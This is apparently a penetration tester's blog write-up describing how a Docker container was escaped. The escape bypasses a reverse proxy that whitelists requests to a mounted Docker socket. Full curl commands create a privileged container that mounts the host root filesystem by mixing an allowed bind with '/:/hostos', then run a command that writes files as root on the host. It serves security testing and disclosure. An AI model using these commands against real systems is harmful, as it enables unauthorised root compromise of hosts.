Legend has it that before his death, Harry Houdini once said: “if it is truly possible for someone to return from the afterlife, I will”. Despite of the fact he was a great illusionist and escape artist, it seems this last proof has revealed to be very hard, even for him. Much simpler trying to escape out of a container. Of course a docker container 🙂 … our topic for today.
The danger of exposing “docker.sock” to a docker
container is well-known and the security literature is full of
examples (one is here[1]) leading to container
escape and privilege escalation issues in the host machine. But
sometimes this is required (if not even necessary) for legitimate
purposes, like creating other containers or pushing configuration
settings. While the docker security guidelines advocate to not
share the Docker UNIX socket inside a container, at the same time
the project developers do not give any advice on how to secure such
a kind of configuration whenever it is needed for “good
reasons”. And that’s why so many companies that adopt docker
and deliver services based on it, still today, suffer from this
problem.
For example, last year a customer of us has contracted a
security firm to check the robustness of their docker
infrastructure. One of their main findings was the file
“docker.sock” being mounted within some of their
containers, which of course was a sufficient condition to
compromise the entire host operating system. In the absence of a
strong solution coming from the community, our customer has decided
to build its own solution. They created a reverse proxy in front of
the Docker UNIX socket file that would add
authentication/authorization, and would prevent insecure
utilization of the Docker socket itself.
Then they asked us to test the new architecture. This is the story of how the sympathetic Red Timmy has managed to bypass it.
The architecture
Before moving forward, we must explain a bit the implementation we have been called to test and a picture should make the job easy enough.
In this architecture there are two UNIX socket files now:
/var/run/docker.sockis not exposed within the docker containers anymore. It is readable and writable only for the “root” user and the “docker” group. As you already know the docker engine uses it directly./var/run/somethingelse.sockis instead the resource exposed within the docker containers. The file is created in order to be readable and writable only by an unprivileged user which is not part of the docker group. In this way the process creating it does not own enough access rights to read and write directly into “/var/run/docker.sock”. The docker engine remains the only one able to do that.
Then a reverse proxy, running as a privileged user, sits in the
middle of these two UNIX socket files. It fetches requests from
“/var/run/somethingelse.sock” and determines whether
or not these must be forwarded to
“/var/run/docker.sock” based on a whitelist of
authorized values preemptively saved in a configuration file. For
example, a request could be let pass through only if it matches a
specific HTTP method (GET, POST, etc…), path (for
example “/containers/create”) and/or JSON body.
At the same way the reverse proxy returns the replies from
“docker.sock” to “somethingelse.sock”
once they are in the pipeline. At first glance the workflow looked
fine and flawless.
Let the dance begin
Ok, all clear. We have been provided with access to a docker container:
[root@dockerhost ~]# docker exec -it 7c4e2742becb
bash <-- container command prompt
bash-4.4$
Also our handsome UNIX socket file is where it is supposed to be:
bash-4.4$ ls –al
/var/run/somethingelse.sock
srw------- 1 unpriv root 0 Feb 13 11:31
somethingelse.sock
Now we must find a way to escape out of there. First thing we try is to leverage the “old” trick as documented in the report that our customer has received from the security firm they had originally contracted:
bash-4.4$ curl –i –s –-unix-socket
/var/run/somethingelse.sock –X POST –H ‘Content-Type:
application/json’ –data-binary
‘{"Hostname":
"","Domainname":
"","User":
"","AttachStdin":
true, "AttachStdout": true,
"AttachStderr": true,
"Tty":
true,"OpenStdin":
true,"StdinOnce":
true,"Entrypoint":
"/bin/bash”,”Image":
"dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT","Volumes":
{"/hostos/": {}},
"HostConfig": {"Binds":
["/:/hostos"],
"Privileged": true}}’
http://localhost/containers/create
The main difference in our command is that instead of
establishing a communication channel with
“/var/run/docker.sock” (not mounted in the container)
we target “/var/run/somethingelse.sock” (which is
instead mounted in the container). All the hacking steps are
performed with curl. Specifically, as we are communicating with a
UNIX domain socket, the “--unix-socket
<filename>” option is adopted.
The command above is the same (a bit extended) as specified in the section “Create the container with the mounted volume” of this online tutorial[2], which the penetration tester had linked into his report. I strongly suggest you to read that post before going ahead with this one, if you are not familiar with the technique in general. Anyway, even if you are not familiar, below follows a short explanation of what we were trying to do with that command.
Basically, from inside the container we are in, we are trying to
create another container that, once started, will
have the root directory “/”of the
host operating system mounted under its
“/hostos/” folder. If that can be
done, it is game over. Just connecting to the new container and
launching the command “chroot /hostos” would provide
the attacker with full access to the host operating system and all
its files.
In our case instead the reverse proxy replied with:
HTTP/1.1 403 Forbidden
Honestly it was expected. Something else had to be attempted.
Time for circumvention
After a bit of trial and error we understand that the stricter
check is performed on the value passed to “Binds”.
When we provide the string “/:/hostos” trying to map
the filesystem “/” of the host into the
“/hostos” directory of the container, the request is
rejected because the specified string is not in the whitelist.
However we discovered, for example, that
“/dev/log:/dev/log” is an accepted value instead. It
means the reverse proxy allows us to create a container from inside
another container when that value is provided. Of course there is
nothing special with using “/dev/log” to bypass the
filter. But what if the strings “/:/hostos” and
“/dev/log:/dev/log” are both specified as part of the
same “Binds” parameter, like below?
bash-4.4$ curl –i –s –-unix-socket
/var/run/somethingelse.sock –X POST –H ‘Content-Type:
application/json’ –data-binary
‘{"Hostname":
"","Domainname":
"","User":
"","AttachStdin":
true,"AttachStdout":
true,"AttachStderr":
true,"Tty":
true,"OpenStdin":
true,"StdinOnce":
true,"Entrypoint":
"/bin/bash","Image":
"dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT","Volumes":
{"/hostos/": {}},
"HostConfig": {"Binds":
["/:/hostos", "/dev/log:/dev/log"],
"Privileged": true}}’
http://localhost/containers/create
Unexpectedly, the reverse proxy replies with:
HTTP/1.1 201 Created
Api-Version: 1.39
Content-Length: 90
Content-Type: application/json
Date: Fri, 15 May 2020 08:19:58 GMT
Docker-Experimental: false
Ostype: linux
Server: Docker/18.09.11 (linux)
{"Id":"4fa6bfc84930[...]","Warnings":null}
So it means we are allowed to create a new container where the
root of the host filesystem is mounted into its
“/hostos” directory. To confirm that, we manually
started the newly created container from the host OS and then
accessed it. This was what we got…
[root@4fa6bfc84930 opt]# ls -al
/hostos/
[...]
drwxr-xr-x. 102 root root 8192 May 6 09:08 etc
drwxr-xr-x. 6 root root 56 Feb 7 2018 home
drwxr-xr-x. 2 root root 6 Mar 10 2016 media
drwxr-xr-x. 2 root root 6 Mar 10 2016 mnt
drwxr-xr-x. 17 root root 4096 Mar 24 2017 nfs
drwxr-xr-x. 7 root root 106 Jan 7 2019 opt
dr-xr-xr-x. 375 root root 0 Nov 23 08:23 proc
dr-xr-x---. 8 root root 4096 May 14 13:51 root
drwxr-xr-x. 35 root root 1140 May 6 09:08 run
lrwxrwxrwx. 1 root root 8 Jan 18 2018 sbin -> usr/sbin
[...]
…meaning that from inside the container we have total control over the entire host OS filesystem, which is what the reverse proxy implementation was attempting to prevent. Good, but how was that possible? Well, let’s have a look once more at the interested part that made the trick possible:
"Binds": ["/:/hostos",
"/dev/log:/dev/log"]
It seems that in case just one of the strings given to the
“Binds” parameter is present in the whitelist, the
whole check is considered passed, regardless of the presence of
other values that are instead not defined in the whitelist
configuration. The logic of the reverse proxy was clearly
flawed.
Start the container just created
So from inside the current container we have managed to create a new one with full access to the host OS filesystem. But we have not executed anything in the host OS yet…and we are still confined within our unprivileged container.
bash-4.4$
Let’s try to get out of here. First of all let’s see if after its creation we can also start the container from the place where we are now:
curl -i -s --unix-socket /var/run/somethingelse.sock -X
POST -H 'Content-Type: application/json'
http://localhost/containers/4fa6bfc84930[...]/start
As indicated in the Docker API[3]
the endpoint to target this time is
“/containers/{ID}/start”, where ID (in bold above) is
the value the reverse proxy has returned to us with the previous
request. The reply we get is:
HTTP/1.1 204 No Content
Api-Version: 1.39
Date: Fri, 15 May 2020 08:20:34 GMT
Docker-Experimental: false
Ostype: linux
Server: Docker/18.09.11 (linux)
It means we are allowed to do that. So far, so good. Now the
high privileged container is started and we want to execute a
command in there. We could for example create an exec instance[4]
and then start[5]
it to get the result back. Unfortunately the reverse proxy did not
let us pass through, because the endpoint
“/containers/{id}/exec” is not in the
whitelist:
HTTP/1.1 403 Forbidden
Ok, what if with the docker API we attach[6] to the created privileged container to send it input and read the output directly from the unprivileged one where we are confined now?
curl -i -s --unix-socket /var/run/somethingelse.sock -X
POST
“http://localhost/containers/4fa6bfc84930/attach?logs=1&stream=1&stdin=true&stdout=true&stderr=true”
In this case the reply is encouraging…
HTTP/1.1 200 OK
Content-Type: application/vnd.docker.raw-stream
Date: Thu, 14 May 2020 16:05:09 GMT
Transfer-Encoding: chunked
…but for some reason we are returned back to the shell of our unprivileged container:
bash-4.4$
Probably the reverse proxy do not handle well such a kind of requests even though not explicitly prohibited in the whitelist configuration file. We clearly cannot abuse this mechanism.
Searching for something else
What other options are we left with in order to execute a
command in the started container? Unfortunately not many and
everything we tried was blocked or did not work. Let’s analyze what
we are allowed to do so far. The best achievement is the ability to
bypass the reverse proxy’s whitelist and create a container. We
decided then to take a better look at the Docker API and stumbled
upon the parameter “Cmd[7]” of the
“/containers/create” endpoint.
This looks like a command run when the container is started. We decided to give it a try by creating a new container specifying that parameter:
curl –i –s –-unix-socket
/var/run/somethingelse.sock –X POST –H ‘Content-Type:
application/json’ –data-binary
‘{"Hostname":
"","Domainname":
"","User":
"","AttachStdin":
true,"AttachStdout":
true,"AttachStderr":
true,"Tty":
true,"OpenStdin":
true,"StdinOnce":
true,"Entrypoint":"","Cmd": "touch
/hostos/root/marco_RT_was_here.txt","Image":
"dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT","Volumes":
{"/hostos/": {}},
"HostConfig": {"Binds":
["/:/hostos", "/dev/log:/dev/log"],
"Privileged": true}}’
http://localhost/containers/create
Compared to the previous launched command:
- “
Entrypoint” is now empty as we don’t need it. - “
Cmd” is set to the command we want to execute in the host OS, that is “touch /hostos/root/marco_RT_was_here.txt“ - “
Binds” is configured the same way as the previous request in order to mount the root of the host OS into the “/hostos” directory of the new created container.
As “/hostos” is containing the full host filesystem
due to the whitelist bypass of the “Binds” parameter
seen before, the assumption is that this request will actually
create the file named “marco_RT_was_here.txt” into the
“/root” folder with the permissions of the root user,
once the container is started.
After submitting our request, the reverse proxy replies with the
ID of the new container (abac34acc1003[...]). Time to
start it:
curl -i -s --unix-socket /var/run/somethingelse.sock -X
POST -H 'Content-Type: application/json'
http://localhost/containers/abac34acc1003[...]/start
We would have expected to see the file
“marco_RT_was_here.txt” created inside the
“/root” folder of the host OS. Instead we were wrong.
However, a quick look at the description of the “Cmd”
parameter was sufficient to reveal that the command must be passed
as an “Array of string”. Which means our payload has to be
shaped like this:
["touch", "/hostos/root/marco_RT_was_here.txt"]
…and not as a single static string “touch
/hostos/root/marco_RT_was_here.txt”. Ok, let’s send the
request again:
curl -i -s --unix-socket /var/run/somethingelse.sock -X
POST -H 'Content-Type: application/json' --data-binary
'{"Hostname": "","Domainname": "","User": "","AttachStdin":
true,"AttachStdout": true,"AttachStderr": true, "Tty":
true,"OpenStdin": true, "StdinOnce": true,"Entrypoint":
"","Cmd": ["touch",
"/hostos/root/marco_RT_was_here.txt"],"Image":
"dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT","Volumes":
{"/hostos/": {}}, "HostConfig": {"Binds": ["/:/hostos",
"/dev/log:/dev/log"], "Privileged": true}}'
http://localhost/containers/create
The ID the reverse proxy returns is 21429c9550c5c.
Then, with that ID in our hands, the container is started for the
umpteenth time…
curl -i -s --unix-socket /var/run/somethingelse.sock -X
POST -H 'Content-Type: application/json'
http://localhost/containers/21429c9550c5c[...]/start
…and now things seem to work, as shown in the picture below:
This incontrovertibly demonstrates that the filesystem of the host machine is fully accessible from the container we are confined in, and that we can write files on the host OS as root. This can then be taken further in ways only limited by our imagination. From the host OS we could for example write a cronjob, launch a reverse shell, deploy a malicious privileged docker image with ssh port exposed, etc…
Wonderful! This terminates our post. Do not forget to follow us on twitter[8], github[9] and above all have a look at the Red Timmy Academy[10] page to get our last courses and trainings.
References
Read more https://packetstormsecurity.com/news/view/31515/A-Tale-Of-Escaping-A-Hardened-Docker-Container.html

